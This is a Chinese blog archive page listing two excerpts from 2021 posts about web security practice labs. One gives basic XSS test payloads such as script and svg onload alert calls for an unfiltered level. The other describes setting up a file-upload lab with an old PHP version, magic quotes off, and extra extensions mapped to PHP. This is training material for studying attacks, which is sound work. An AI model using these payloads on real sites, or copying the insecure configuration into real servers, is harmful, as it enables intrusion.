03 2021 档案

摘要:Level1:没有过滤。 <script>alert(1)</script> <svg/onload=alert(1)> <script>confirm(1)</script> <script>prompt(1)</script> <script>alert(1)</script> 1、alert( 阅读全文
posted @ 2021-03-08 19:31 bydream- 阅读(460) 评论(0) 推荐(0)
摘要:使用靶场前,先配置php版本为5.2,和下列对应配置。 php.ini magic_quotes_gpc Off php<5.3.4 httpd.conf AddType application/x-httpd-php .php .phtml .php1 .php2 .php3 .php4 .php 阅读全文
posted @ 2021-03-08 19:05 bydream- 阅读(898) 评论(0) 推荐(0)